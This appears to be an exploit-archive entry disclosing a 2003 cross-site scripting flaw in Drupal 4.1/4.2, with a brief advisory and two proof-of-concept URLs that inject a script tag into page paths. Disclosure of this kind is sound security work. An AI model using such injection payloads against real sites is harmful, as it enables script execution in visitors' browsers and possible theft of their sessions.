Drupal 4.1/4.2 - Cross-Site Scripting

Author: Ferruh Mavituna
type: webapps
platform: php
port: 
date_added: 2003-07-21  
date_updated: 2012-11-27  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22940.txt  
source: https://www.securityfocus.com/bid/8235/info

The Drupal content management system is prone to a cross-site scripting vulnerability. This issue is exposed through the main page and through other sub-pages. An attacker may exploit this issue by including hostile HTML and script code in a malicious link to Drupal. This code may be rendered in the web browser of a user who visits the link.

http://www.example.com/xxx"><script>alert(document.domain)</script><"

http://www.example.com/node/view/666"><script>alert(document.domain)</script>